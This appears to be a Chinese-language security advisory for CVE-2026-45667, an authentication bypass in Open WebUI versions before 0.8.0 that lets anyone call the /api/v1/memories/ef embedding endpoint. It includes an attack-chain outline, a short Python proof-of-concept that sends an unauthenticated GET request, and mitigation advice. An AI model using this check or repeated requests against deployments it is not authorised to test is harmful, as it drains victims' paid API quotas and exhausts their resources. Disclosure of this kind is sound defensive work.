CVE-2026-45667 CVSS 6.5 中危

Open WebUI 未授权访问漏洞 (CVE-2026-45667)

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45667

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个旨在完全离线运行的自托管人工智能平台。在0.8.0版本之前，系统存在安全缺陷，特定API端点 `/api/v1/memories/ef` 缺乏身份验证机制。未认证的攻击者可直接调用该接口触发嵌入生成操作。若系统配置了付费API提供商，此漏洞将导致资源被滥用，进而产生直接的经济成本。该漏洞已在0.8.0版本中修复。

技术细节

该漏洞源于Open WebUI在处理特定API请求时未正确实施访问控制。受影响版本中，路由 `/api/v1/memories/ef` 未配置身份验证中间件，允许匿名网络请求直接到达后端处理逻辑。当后端接收到GET请求时，会调用 `request.app.state.EMBEDDING_FUNCTION(...)` 方法。此方法通常用于生成文本的向量嵌入，这涉及到调用外部大语言模型（LLM）API（如OpenAI等）。由于缺乏认证，攻击者可以通过构造HTTP请求反复调用此接口。这种利用方式不需要复杂的Payload，仅需发送网络请求即可。对于使用按量付费API服务的部署环境，攻击者可以消耗受害者的API配额，造成严重的经济损失。此外，大量的并发请求还可能导致服务资源耗尽，影响可用性。

攻击链分析

STEP 1

Discovery

攻击者扫描目标端口，发现Open WebUI服务运行于特定IP地址。

STEP 2

Exploitation

攻击者向 `/api/v1/memories/ef` 发送未经身份验证的GET请求。

STEP 3

Execution

服务器端未验证用户身份，直接执行 `EMBEDDING_FUNCTION`，调用后端AI模型接口。

STEP 4

Impact

攻击者消耗受害者的API配额，造成直接经济损失或资源耗尽。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_poc(target_url):
    """
    PoC for CVE-2026-45667
    Checks if the embedding function endpoint is accessible without auth.
    """
    endpoint = f"{target_url}/api/v1/memories/ef"
    
    try:
        # Send a GET request without any authentication headers
        response = requests.get(endpoint, timeout=10)
        
        if response.status_code == 200:
            print("[+] Vulnerability confirmed: Endpoint accessible without authentication.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Endpoint returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    check_poc(target)

影响范围

Open WebUI < 0.8.0

防御指南

临时缓解措施

如果无法立即升级，建议在反向代理（如Nginx）或防火墙层阻断外部对 `/api/v1/memories/ef` 路径的访问，或仅允许内网受信任IP调用该接口，以防止未授权的资源消耗。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表